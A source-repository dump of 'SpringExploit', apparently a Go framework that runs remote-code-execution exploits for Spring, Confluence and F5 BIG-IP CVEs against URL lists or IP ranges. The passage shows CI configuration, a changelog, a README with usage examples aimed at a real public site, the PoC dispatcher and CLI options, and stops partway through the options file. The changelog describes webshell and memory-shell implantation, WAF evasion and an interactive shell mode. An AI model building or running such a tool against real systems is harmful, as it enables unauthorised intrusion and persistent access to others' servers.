├── .github └── workflows │ ├── CHANGELOG.yml │ ├── maven.yml │ ├── release-binary.yml │ └── replace.yml ├── .gitignore ├── .goreleaser.yml ├── CHANGELOG.md ├── LICENSE ├── README.md ├── cmd ├── commons │ ├── attack │ │ ├── Pocslist.go │ │ └── attack.go │ ├── core │ │ ├── banner.go │ │ ├── doc.go │ │ ├── getreq.go │ │ ├── options.go │ │ ├── runner.go │ │ ├── update.go │ │ ├── update2.go │ │ └── update_test.go │ ├── poc │ │ ├── 2021 │ │ │ ├── CVE-2021-22986.go │ │ │ └── CVE-2021-26084.go │ │ ├── 2022 │ │ │ ├── CVE-2022-1388.go │ │ │ ├── CVE-2022-22947.go │ │ │ ├── CVE-2022-22963.go │ │ │ ├── CVE-2022-22965.go │ │ │ └── CVE-2022-26134.go │ │ ├── IsAliveUrl.go │ │ ├── PoC.go │ │ └── demo.go │ ├── req │ │ ├── request.go │ │ └── transform.go │ ├── resp │ │ └── resp.go │ └── utils │ │ ├── base64.go │ │ ├── dnslog.go │ │ ├── file.go │ │ ├── httpclient.go │ │ ├── ips.go │ │ ├── proxy.go │ │ ├── readfile.go │ │ ├── saveresult.go │ │ ├── setrequest.go │ │ └── useragent.go ├── logs │ └── LogToFile.go ├── main.go └── test │ ├── FileWriter.go │ ├── Strings.go │ ├── ants.go │ ├── checkerr.go │ ├── copymap.go │ ├── dnslog.go │ ├── emun.go │ ├── header.go │ ├── headurl.go │ ├── interface │ ├── demo.go │ ├── demo │ │ └── test.go │ ├── demo1.go │ └── test1.go │ ├── ip.go │ ├── prompt.go │ ├── test.go │ ├── test1.go │ ├── threads.go │ └── url.go ├── go.mod └── go.sum /.github/workflows/CHANGELOG.yml: -------------------------------------------------------------------------------- 1 | # .github/workflows/update-changelog.yaml 2 | name: "Update Changelog" 3 | 4 | on: 5 | release: 6 | types: [released] 7 | workflow_dispatch: 8 | 9 | jobs: 10 | update: 11 | runs-on: ubuntu-latest 12 | 13 | steps: 14 | - name: Checkout code 15 | uses: actions/checkout@v2 16 | with: 17 | ref: ${{ github.event.release.target_commitish }} 18 | 19 | - name: Update Changelog 20 | uses: stefanzweifel/changelog-updater-action@v1 21 | with: 22 | latest-version: ${{ github.event.release.tag_name }} 23 | 
release-notes: ${{ github.event.release.body }} 24 | 25 | - name: Commit updated CHANGELOG 26 | uses: stefanzweifel/git-auto-commit-action@v4 27 | with: 28 | branch: ${{ github.event.release.target_commitish }} 29 | commit_message: 🎆 Update CHANGELOG 30 | file_pattern: CHANGELOG.md 31 | -------------------------------------------------------------------------------- /.github/workflows/maven.yml: -------------------------------------------------------------------------------- 1 | name: Release Maven 2 | 3 | 4 | on: workflow_dispatch 5 | # on: 6 | # push: 7 | # tags: 8 | # - '*' 9 | #on: [push] 10 | 11 | 12 | 13 | jobs: 14 | build: 15 | runs-on: ubuntu-latest 16 | 17 | steps: 18 | - uses: actions/checkout@v2 19 | 20 | 21 | - name: Set up JDK 1.8 22 | uses: actions/setup-java@v1 23 | with: 24 | distribution: "Liberica" 25 | java-version: 1.8 26 | java-package: jdk+fx 27 | - name: Build with Maven 28 | run: 29 | mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V 30 | - name: Create Release 31 | id: create_release 32 | uses: SummerSec/create-release@master 33 | with: 34 | tag_name: ${{ github.ref }} 35 | release-name: Release ${{ github.ref }} 36 | draft: false 37 | prerelease: false 38 | env: 39 | GITHUB_TOKEN: ${{ secrets.RELEASE }} 40 | 41 | 42 | - name: Upload a Build Artifact 43 | id: upload-build-artifact 44 | uses: actions/upload-artifact@v2.3.1 45 | with: 46 | # Artifact name 47 | # 修改打包后的文件名称 48 | name: # optional, default is artifact 49 | SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar 50 | # A file, directory or wildcard pattern that describes what to upload 51 | path: 52 | target/*-SNAPSHOT-all.jar 53 | # The desired behavior if no files are found using the provided path. 
54 | 55 | - name: Auto Upload Release 56 | id: upload-release-asset 57 | uses: actions/upload-release-asset@v1.0.1 58 | env: 59 | GITHUB_TOKEN: ${{secrets.RELEASE}} 60 | with: 61 | # 修改打包后的文件名称 62 | upload_url: ${{ steps.create_release.outputs.upload_url }} 63 | asset_path: target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar 64 | asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar 65 | asset_content_type: application/java-archive 66 | 67 | 68 | -------------------------------------------------------------------------------- /.github/workflows/release-binary.yml: -------------------------------------------------------------------------------- 1 | name: 🎉 Release Binary 2 | on: 3 | create: 4 | tags: 5 | - v* 6 | workflow_dispatch: 7 | 8 | jobs: 9 | release: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - name: "Check out code" 13 | uses: actions/checkout@v3 14 | with: 15 | fetch-depth: 0 16 | 17 | - name: "Set up Go" 18 | uses: actions/setup-go@v2 19 | with: 20 | go-version: 1.17 21 | 22 | - name: "Create release on GitHub" 23 | uses: goreleaser/goreleaser-action@v2 24 | with: 25 | args: "release --rm-dist" 26 | version: latest 27 | workdir: . 
28 | env: 29 | GITHUB_TOKEN: "${{ secrets.RELEASE }}" 30 | -------------------------------------------------------------------------------- /.github/workflows/replace.yml: -------------------------------------------------------------------------------- 1 | name: Replace 2 | on: workflow_dispatch 3 | jobs: 4 | build: 5 | runs-on: ubuntu-latest 6 | steps: 7 | - uses: actions/checkout@v2 8 | - name: Find and Replace 9 | uses: SummerSec/gha-find-replace@master 10 | with: 11 | find: "SummerSec/template" 12 | replace: ${{ github.repository }} 13 | regex: false 14 | include: "README.md" # 需要替换的文件内容 15 | - name: Push changes 16 | uses: SummerSec/push@master # 更新README.md 17 | with: 18 | github_token: ${{ secrets.RELEASE }} # github token -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | logs/** 3 | logs 4 | logs.txt 5 | **.exe 6 | **.zip 7 | **.tar.gz 8 | target.txt 9 | result.txt 10 | **.py 11 | urls.txt 12 | SpringExploit_**/** 13 | 14 | -------------------------------------------------------------------------------- /.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | 5 | builds: 6 | - env: 7 | - CGO_ENABLED=0 8 | goos: 9 | - windows 10 | - linux 11 | - darwin 12 | goarch: 13 | - amd64 14 | - 386 15 | - arm 16 | - arm64 17 | 18 | # ignore: 19 | # - goos: darwin 20 | # goarch: '386' 21 | # - goos: windows 22 | # goarch: 'arm' 23 | # - goos: windows 24 | # goarch: 'arm64' 25 | 26 | binary: '{{ .ProjectName }}' 27 | main: cmd/main.go 28 | 29 | archives: 30 | - format: zip 31 | replacements: 32 | darwin: macOS 33 | 34 | checksum: 35 | algorithm: sha256 36 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.1.9 - 
2022-06-14 2 | 3 | ### Changelog 4 | 5 | - 24844a4 :bug: fix IsAliveUrl bug 6 | - 2097cb8 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 7 | - 53479ac 🚲 使用前会自动检测是否最新版本并询问是否更新 8 | - b0ec7bd 🎆 Update CHANGELOG 9 | - b7db213 🛸 版本0.1.9 10 | 11 | ## 0.1.8 - 2022-06-08 12 | 13 | ### Changelog 14 | 15 | - c8f78f6 🪂 参考beichen实现CVE-2022-26134实现哥斯拉内存马注入 16 | - 64750da 🎆 Update CHANGELOG 17 | - 42533c3 🤦‍♂️ 版本0.1.8 18 | 19 | ## 0.1.7 - 2022-06-04 20 | 21 | ### Changelog 22 | 23 | - bffb4fc 🍓 版本0.1.7 24 | - 3019c68 🪂 修改CVE-2022-26134的Response头为Host 25 | - 48d898d 🎆 Update CHANGELOG 26 | - d20ac92 🚲 版本0.1.8 27 | - db8b225 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 28 | - d166b83 🦽 改良版的url编码,默认对所以的字符都进行编码 29 | - 037bc88 🎆 Update CHANGELOG 30 | - 48c59e1 🚨 版本0.1.7 31 | 32 | ## 0.1.17 - 2022-06-04 33 | 34 | ### Changelog 35 | 36 | - db8b225 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 37 | - d166b83 🦽 改良版的url编码,默认对所以的字符都进行编码 38 | - 037bc88 🎆 Update CHANGELOG 39 | - 48c59e1 🚨 版本0.1.7 40 | 41 | ## 0.1.6 - 2022-06-04 42 | 43 | ### Changelog 44 | 45 | - aeb69fa 🚂 增加CVE-2022-26134 && 修改部分代码 46 | - 3b32cb6 🚨 增加重定向参数,用户可以自定义是否要3xx跳转 47 | 48 | ## 0.1.5 - 2022-05-20 49 | 50 | ## Changelog 51 | 52 | - d738fc9 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 53 | - 0c078ee 修复提交url的bug以及默认会重定向bug,目前不会301跳转。 54 | - 8dbfad1 Update .goreleaser.yml 55 | - 9fbc290 🎆 Update CHANGELOG 56 | - 09697b7 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 57 | - 6a18326 🚂更新版本号0.1.5 58 | - 0c59be4 Update CHANGELOG 59 | 60 | ## 0.1.4 - 2022-05-18 61 | 62 | ## Changelog 63 | 64 | - ba5d3d8 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 65 | - 3548f88 🛸使用go-github-update框架,替代原本go-update框架。原本框架在Linux体验并不是很好 66 | - 0ac73ce Update CHANGELOG 67 | - 25708c0 ✈️更新版本号到0.1.4 68 | 69 | ## 0.1.3 - 2022-05-18 70 | 71 | ## Changelog 72 | 73 | - 30cb9d8 🛵更新版本号0.1.3 74 | - 9b3540a 
🎈请使用-update参数升级,Linux用户强烈建议升级。 75 | - 15c3651 修复bug,在Unix和类Unix(如Linux):换行符采用\n. Windows和MS-DOS:换行符采用\r\n。bug产生的原因是一味的直接去掉url结尾的两个字符 76 | - ecdd043 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 77 | - 28915ef 使用-i参数时加入https协议,不在仅仅是http协议 78 | - 078dfde Update CHANGELOG 79 | 80 | ## 0.1.2 - 2022-05-16 81 | 82 | ## Changelog 83 | 84 | - 35b7c8e 使用-update参数更新,使用-version判断是否是最新版本。 85 | - a9681c3 alive 86 | - c1dcaeb 使用head请求判断url是否alive,如果url失效,默认不会跑所有的pocs,如果需要不判断是否alive请使用-p参数指定poc,如果仅仅需要判断url是否存活可以使用-p ISAlIVEURL 87 | - 5248f4e 更新版本号0.1.12 88 | - b2d8db5 恢复 89 | - 24d395c t 90 | - 3e8d06c Merge branch 'main' of github.com:SummerSec/SpringExploit into main 91 | - cf7af09 协程池换成ants框架,最多限度利用发挥内存作用 92 | - 1ab7c2a Update CHANGELOG 93 | 94 | ## 0.1.1 - 2022-05-12 95 | 96 | ## Changelog 97 | 98 | - 7554801 更新到0.1.1版本,建议使用SpringExploit -update 命令升级 99 | - 692ecf4 将req依赖更新到3.11.2版本彻底不会出现返回包nil问题 100 | - 3b0ce2c 跟新版本号0.1.1 101 | - c6c247c Merge branch 'main' of github.com:SummerSec/SpringExploit into main 102 | - 300cb49 CVE-2022-22965 检测更加准确 && 修复issue3中的问题 && 捕获返回包异常 103 | - 5f4837c Update CHANGELOG 104 | 105 | ## 0.1.0 - 2022-05-12 106 | 107 | ## Changelog 108 | 109 | - 4a33c39 0.1.0 110 | - 15c2543 fix CVE-2021-26084 bug 111 | - 9324301 Update .gitignore 112 | - 174df1e Merge branch 'main' of github.com:SummerSec/SpringExploit 113 | - b606a70 CVE-2022-1388 114 | - e5127e5 Update CHANGELOG 115 | 116 | ## 0.0.9 - 2022-05-10 117 | 118 | ## Changelog 119 | 120 | - 15937ad 解决[issues2](https://github.com/SummerSec/SpringExploit/issues/2)中的问题 121 | - 3e80282 报错优化 122 | - f8a04bf 支持CVE-2021-22986 123 | - 240b5f0 运行时的异常处理 124 | - 846611e 增加异常处理 125 | - 99f60e6 增加判断是否最新版本 126 | - 87f61b6 应用名字 127 | - baacdc3 更新测试 128 | - aaffbaf 参考nuclie实现self更新 129 | - b230672 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 130 | - ed563fc 增加自动更新参数 131 | - d1ec3b4 Update CHANGELOG 132 | - 5d3a844 优化banner输出 133 | 134 | ## 0.0.8 - 2022-05-10 135 | 136 | ## 
Changelog 137 | 138 | - 6cba9b3 增加CVE-2022-1388 使用案例 139 | - 3461e7f 并发优化 140 | - 3b93f17 CVE-2022-1388 命令执行返回的结果为base64加密,防止waf识别 141 | - 7615e78 CVE-2022-1388漏洞支持交互shell执行命令 142 | - ac215b3 命令组合方式 143 | - 45a7b97 README 增加使用说明案例 144 | - f194ae8 支持漏洞 CVE-2022-1388 验证 145 | - 8876309 Update CHANGELOG 146 | 147 | ## 0.0.7 - 2022-05-06 148 | 149 | ## Changelog 150 | 151 | - 1bfdf73 fix 152 | - fa42516 fix CVE-2021-26084验证错误 153 | - 6108c83 fix CVE-2021-26084验证错误 154 | - 6dbd2fe Merge branch 'main' of github.com:SummerSec/SpringExploit into main 155 | - daacabc 修复没有指定poc时的bug 156 | - 0888584 Update CHANGELOG 157 | 158 | ## 0.0.6 - 2022-05-06 159 | 160 | ## Changelog 161 | 162 | - bfb7993 对 cloud getway漏洞判断漏洞增强 163 | - c9bbe0a 支持CVE-2022-22965漏洞 164 | - df6b52d 添加show pocs list参数 输出支持pocs列表 165 | - 4cf4ad4 支持指定poc 166 | - ddf75df ip段的处理 167 | - a9ff698 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 168 | - deaf20a 重构了pocs的目录结构 添加两个参数i和p,后续支持指定vul和ip段 169 | - 70399b6 Update CHANGELOG 170 | 171 | ## 0.0.5 - 2022-04-27 172 | 173 | ## Changelog 174 | 175 | - 1282404 CHANGELOG 176 | - fc7144f CHANGELOG.yml 177 | - 9d28d03 read 178 | - e4b8294 CHANGELOG.yml 179 | - 1084f44 0.0.5 180 | - 7193523 支持CVE-2021-26084漏洞利用,利用成功默认上传蚁剑 181 | - 6bda2ab TODO 182 | 183 | ## 0.0.4 184 | 185 | - [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE) 186 | 187 | ## 0.0.3 188 | 189 | - [x] 支持漏洞CVE-2022-22947 (Spring Cloud Gateway SpELRCE)的漏洞利用 190 | - [x] 自定义并发 191 | - [x] 自定义输出日志位置 192 | - [x] 自定义结果输出位置 193 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 夏天 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 | SpringExploit 4 | 5 | SpringExploit 6 | Forks 7 | Release 8 | Stars 9 | Follower 10 | Visitor 11 | SecSummers 12 | 13 | 14 |

15 | 16 | 17 | 18 | ## 📝 TODO 19 | 20 | * [x] 添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE) 21 | * [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE) 22 | * [x] 添加支持CVE-2021-26084 (Atlassian Confluence RCE) 23 | * [x] 添加支持CVE-2022-26134 (Atlassian Confluence Unauth RCE) 24 | * [x] 添加支持CVE-2022-22965 (Spring Core RCE) 25 | * [x] 添加支持CVE-2022-1388 (F5 BIG-IP RCE) 26 | * [x] 自定义并发 27 | * [x] 自定义输出日志位置 28 | * [x] 自定义结果输出位置 29 | * [x] 支持自定义漏洞利用 30 | * [x] 支持指定ip段eg: 192.168.0.0/24 31 | * [x] 命令执行漏洞式支持交互式执行命令 32 | * [x] 验证url是否存活 33 | * [x] 增加自动更新参数,增加判断是否存在是最新版本 (-version参数) 34 | * [x] 随机User-Agent请求头 35 | 36 | ……… 37 | 38 | 39 | 40 | --- 41 | ## 🐉 来龙去脉 42 | 43 | 为了学习一下golang,花了两天时间,写了这款框架式的exp利用工具练练手,后续还会支持其他的漏洞。初学golang,代码还是很粗糙。一开始是打算就支持Spring系列漏洞的利用,但写到后面自我感觉能够集成其他的漏洞利用。具体会支持那些漏洞,作者会根据情况自我判断,可以提建议,但不一定被采纳。亦可以提交pr。可以查看源代码写poc和exp,写了很多注释,很容易懂。 44 | 45 | 本项目集成的漏洞基本上都是能会被利用的,直接或间接执行命令或者连接webshell,且本地测试通过的。 46 | 47 | 项目已经开了讨论区,如果有建议可以在讨论区提出。 48 | 49 | --- 50 | ## ⚡下载安装 51 | 52 | 在[release](https://github.com/SummerSec/SpringExploit/releases)界面下载对应操作系统版本,因为本项目使用GitHub Action自动编译,不存在后门风险(注:自动编译只说明二进制出自仓库中的工作流,工作流引用的第三方Action和依赖仍在信任链上;发布配置.goreleaser.yml启用了sha256校验,下载后建议核对校验值),如果需要自己下载源码手动编译,请自行百度,不会解答这类问题。 53 | 54 | 55 | 56 | 57 | 58 | --- 59 | ## 🎬 使用方法 60 | 61 | ```cmd 62 | -f 指定文件 -p 指定poc(如果没有-p参数默认跑全部pocs) -m 1 开启debug日志, 默认不开启 -t threads数量 63 | 64 | SpringExploit -f urls.txt -p CVE20221388 -m 1 -t 10 65 | 66 | -proxy 设置代理 -o 保存结果文件位置 -log 日志文件输出位置默认logs/logs-{time}.txt 67 | SpringExploit -u https://www.baidu.com/ -proxy http://127.0.0.1:1080 -o result.txt -log logs/logs.txt 68 | 69 | 还有更多好玩的组合方式,自行探索。除了-f -u -i 三个不能在一个组合命令出现,其他都可以组合成命令。 70 | 71 | example usages: 72 | 73 | SpringExploit -f urls.txt -t 50 74 | SpringExploit -u https://www.baidu.com/ -proxy http://127.0.0.1:1080 75 | SpringExploit -i 127.0.0.1/24 76 | SpringExploit -u https://www.baidu.com/ -p CVE202222947,CVE202222963 77 | SpringExploit -u https://www.baidu.com/ -p CVE20221388 -shell 78 | 79 | 使用head请求判断url是否alive,如果url失效,默认不会跑所有的pocs,如果需要不判断是否alive请使用-p参数指定poc,如果仅仅需要判断url是否存活可以使用-p 
ISAlIVEURL 80 | SpringExploit -sp 81 | 82 | ``` 83 | 84 | ![image-20220422190411847](https://cdn.jsdelivr.net/gh/SummerSec/Images/2022/03/19u419ec19u419ec.png) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | ---- 95 | 96 | 97 | 98 | 99 | ## 🅱️ 免责声明 100 | 101 | 该工具仅用于安全自查检测 102 | 103 | 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 104 | 105 | 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得擅自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。 106 | 107 | 该工具只授权于企业内部进行问题排查,请勿用于非法用途,请遵守网络安全法,否则后果作者概不负责 108 | 109 | ---- 110 | 111 | ![as](https://starchart.cc/SummerSec/SpringExploit.svg) 112 | -------------------------------------------------------------------------------- /cmd/commons/attack/Pocslist.go: -------------------------------------------------------------------------------- 1 | package attack 2 | 3 | import "container/list" 4 | 5 | const ( 6 | ISAlIVEURL string = "ISAlIVEURL" 7 | 8 | // 2022年list 9 | 10 | CVE202226134 string = "CVE202226134" 11 | CVE202222963 string = "CVE202222963" 12 | CVE202222965 string = "CVE202222965" 13 | CVE202222947 string = "CVE202222947" 14 | CVE20221388 string = "CVE20221388" 15 | 16 | // 2021年list 17 | 18 | CVE202126084 string = "CVE202126084" 19 | CVE202122986 string = "CVE202122986" 20 | ) 21 | 22 | func GetList() *list.List { 23 | l := list.New() 24 | 25 | l.PushBack(ISAlIVEURL) 26 | 27 | // 2022年漏洞 28 | l.PushBack(CVE202226134) 29 | l.PushBack(CVE202222963) 30 | l.PushBack(CVE202222965) 31 | l.PushBack(CVE202222947) 32 | l.PushBack(CVE20221388) 33 | 34 | // 2021年漏洞 35 | l.PushBack(CVE202126084) 36 | l.PushBack(CVE202122986) 37 | 38 | return l 39 | } 40 | -------------------------------------------------------------------------------- /cmd/commons/attack/attack.go: -------------------------------------------------------------------------------- 1 | package attack 2 | 3 | import ( 4 | "github.com/SummerSec/SpringExploit/cmd/commons/poc" 5 | _021 "github.com/SummerSec/SpringExploit/cmd/commons/poc/2021" 6 | _022 
"github.com/SummerSec/SpringExploit/cmd/commons/poc/2022" 7 | log "github.com/sirupsen/logrus" 8 | "strings" 9 | ) 10 | 11 | func Sevice(url string, hashmap map[string]interface{}) { 12 | log.Debugf("[*] Start attack %s", url) 13 | pocs := make(map[string]interface{}) 14 | a := addPoc(pocs) 15 | //for k, v := range hashmap { 16 | // log.Debugln("key: ", k, " value: ", v) 17 | //} 18 | //for _, v := range a { // 循环调用poc 19 | // t := v.(poc.PoC) 20 | // t.SendPoc(url, hashmap) 21 | //} 22 | attack(url, a, hashmap) 23 | 24 | } 25 | 26 | func init() { 27 | log.Debug("[*] Init attack") 28 | } 29 | 30 | func addPoc(pocs map[string]interface{}) map[string]interface{} { 31 | log.Debug("[*] Add PoC") 32 | // 判断url是否存活 33 | pocs["ISAlIVEURL"] = &poc.IsAliveUrl{} 34 | 35 | // TODO 添加 2022 poc 36 | //pocs["demo"] = &poc.Demo{} 37 | pocs["CVE202226134"] = &_022.CVE202226134{} 38 | pocs["CVE202222947"] = &_022.CVE202222947{} 39 | pocs["CVE202222963"] = &_022.CVE202222963{} 40 | pocs["CVE202222965"] = &_022.CVE202222965{} 41 | pocs["CVE20221388"] = &_022.CVE20221388{} 42 | 43 | // TODO 添加2021 poc 44 | pocs["CVE202122986"] = &_021.CVE202122986{} 45 | pocs["CVE202126084"] = &_021.CVE202126084{} 46 | 47 | return pocs 48 | 49 | } 50 | 51 | func attack(url string, pocs map[string]interface{}, hashmap map[string]interface{}) { 52 | p := hashmap["Pocs"].(string) 53 | // 以,分割,获取poc name 将其转换为数组 54 | pocsName := strings.Split(p, ",") 55 | //log.Debugf("[*] Pocs: %s", pocsName) 56 | //var ps []string 57 | //if pocsName != nil { 58 | // for _, v := range pocsName { 59 | // log.Debugf("[*] 分割字符串 %s", v) 60 | // ps = append(ps, v) 61 | // } 62 | //} 63 | // 如果没有选定字符串 则默认所有pocs 64 | if len(pocsName) == 1 && pocsName[0] == "" { 65 | f := pocs["ISAlIVEURL"].(poc.PoC).CheckExp(nil, url, hashmap) 66 | if f { 67 | log.Infof("[*] %s is alive", url) 68 | } else { 69 | log.Infof("[*] %s is not alive, donot attack all pocs, Please check url is alive ?", url) 70 | return 71 | } 72 | log.Info("[*] attack 
all pocs") 73 | for k, v := range pocs { 74 | if k == "ISAlIVEURL" { 75 | continue 76 | } 77 | log.Infof("[*] attack %s poc %s", url, k) 78 | t := v.(poc.PoC) 79 | t.SendPoc(url, hashmap) 80 | } 81 | } else { 82 | for _, v := range pocsName { 83 | log.Infof("[*] attack %s poc %s", url, v) 84 | if v != "" { 85 | t := pocs[v].(poc.PoC) 86 | t.SendPoc(url, hashmap) 87 | } 88 | } 89 | } 90 | 91 | } 92 | -------------------------------------------------------------------------------- /cmd/commons/core/banner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "fmt" 5 | ) 6 | 7 | const banner = ` 8 | _________ .__ ___________ .__ .__ __ 9 | / _____/______ _______ |__| ____ ____ \_ _____/___ _________ | | ____ |__|_/ |_ 10 | \_____ \ \____ \\_ __ \| | / \ / ___\ | __)_ \ \/ /\____ \ | | / _ \ | |\ __\ 11 | / \| |_> >| | \/| || | \/ /_/ > | \ > < | |_> >| |__( <_> )| | | | 12 | /_______ /| __/ |__| |__||___| /\___ / /_______ //__/\_ \| __/ |____/ \____/ |__| |__| 13 | \/ |__| \//_____/ \/ \/|__| 14 | 15 | ` 16 | 17 | // TODO 修改版本号 18 | const version = "0.1.10" 19 | 20 | func ShowBanner() { 21 | fmt.Println(banner) 22 | fmt.Println("\t\t\tAuthor: SummerSec Version:", version+" Github: https://Github.com/SummerSec\n") 23 | 24 | } 25 | -------------------------------------------------------------------------------- /cmd/commons/core/doc.go: -------------------------------------------------------------------------------- 1 | package core 2 | -------------------------------------------------------------------------------- /cmd/commons/core/getreq.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | // GetReq get request 4 | func GetReq() map[string]string { 5 | var req = map[string]string{ 6 | "method": "GET", 7 | } 8 | return req 9 | 10 | } 11 | -------------------------------------------------------------------------------- 
/cmd/commons/core/options.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/attack" 7 | "github.com/SummerSec/SpringExploit/cmd/logs" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type Options struct { 12 | // 日志级别 13 | Mode int 14 | // file to read 15 | File string 16 | // 传入的url 17 | Url string 18 | // 设置超时时间 19 | Timeout int 20 | 21 | // 代理设置 22 | Proxy string 23 | 24 | // 版本号 25 | Version bool 26 | // 是否输出详细信息 27 | Verbose bool 28 | // 线程数量 29 | Thread int 30 | // 日志输出文件 31 | LogFile string 32 | // 重复请求次数 33 | Retry int 34 | 35 | // 保存结果 36 | Out string 37 | 38 | // pocs 选择特定的poc 39 | Pocs string 40 | // ip 段 41 | IP string 42 | // show pocs list 43 | SP bool 44 | 45 | // 是否进入交互shell 46 | Shell bool 47 | // 强制开启HTTP 1.1 48 | H1 bool 49 | // 更新到最新版本 50 | Update bool 51 | // 重定向 52 | Redirect bool 53 | } 54 | 55 | func (o Options) toString() interface{} { 56 | 57 | return o 58 | } 59 | 60 | func ParseOptions() *Options { 61 | options := &Options{} 62 | flag.IntVar(&options.Mode, "m", 0, "debug mode off (debug mode = 1) default mode = 0") 63 | flag.IntVar(&options.Thread, "t", 50, "threads number ") 64 | flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt http(s)://host:port/path/ (notes: The last line must be empty)") 65 | flag.StringVar(&options.Url, "u", "", "url to read example: -url=http://www.baidu.com:80/") 66 | flag.StringVar(&options.Proxy, "proxy", "", "proxy example: -proxy=http(socks5)://127.0.0.1:8080 ") 67 | flag.BoolVar(&options.Version, "version", false, "show version") 68 | flag.BoolVar(&options.Verbose, "verbose", false, "show verbose") 69 | flag.BoolVar(&options.SP, "sp", false, "show pocs list") 70 | flag.StringVar(&options.LogFile, "log", "", "log file example: -log=/logs/logs.txt") 71 | flag.IntVar(&options.Retry, "retry", 1, "repeat request times") 72 | 
//flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ") 73 | flag.IntVar(&options.Timeout, "timeout", 10, "timeout") 74 | flag.StringVar(&options.Out, "o", "result.txt", "out file example: -o=result.txt default result.txt") 75 | flag.StringVar(&options.Pocs, "p", "", "pocs example: -p=CVE202222947,CVE202122963,poc3") 76 | flag.StringVar(&options.IP, "i", "", "ip segment example: -i=192.168.1.1/32") 77 | flag.BoolVar(&options.Shell, "shell", false, "whether to enter the interactive shell") 78 | flag.BoolVar(&options.H1, "h1", false, "force to use HTTP 1.1") 79 | flag.BoolVar(&options.Update, "update", false, "update to the latest version") 80 | flag.BoolVar(&options.Redirect, "redirect", false, "whether to follow redirect") 81 | flag.Parse() 82 | 83 | // TODO 修改版本号 84 | logs.SaveLogs(options.LogFile) 85 | ShowBanner() 86 | showVerbose(options) 87 | confirmAndSelfUpdate() 88 | 89 | if options.Version { 90 | //ShowBanner(v) 91 | } else if url := options.Url; url != "" { 92 | options.Thread = 1 93 | options.File = "" 94 | //ShowBanner(v) 95 | } else if options.File != "" { 96 | options.Url = "" 97 | //ShowBanner(v) 98 | } else if options.IP != "" { 99 | options.File = "" 100 | options.Url = "" 101 | } else if options.SP { 102 | showPocsList() 103 | } else if options.Update { 104 | } else { 105 | //ShowBanner(v) 106 | flag.PrintDefaults() 107 | } 108 | 109 | return options 110 | 111 | } 112 | 113 | func showPocsList() { 114 | fmt.Println("Pocs list: ") 115 | ls := attack.GetList() 116 | // 遍历list,输出pocs名称 117 | for i := ls.Front(); i != nil; i = i.Next() { 118 | fmt.Println(i.Value) 119 | } 120 | } 121 | 122 | func showVerbose(options *Options) { 123 | if !options.Verbose { 124 | switch options.Mode { 125 | case 1: 126 | log.SetLevel(log.DebugLevel) 127 | case 2: 128 | log.SetLevel(log.FatalLevel) 129 | case 3: 130 | log.SetLevel(log.ErrorLevel) 131 | case 4: 132 | log.SetLevel(log.WarnLevel) 133 | case 5: 134 | log.SetLevel(log.InfoLevel) 135 
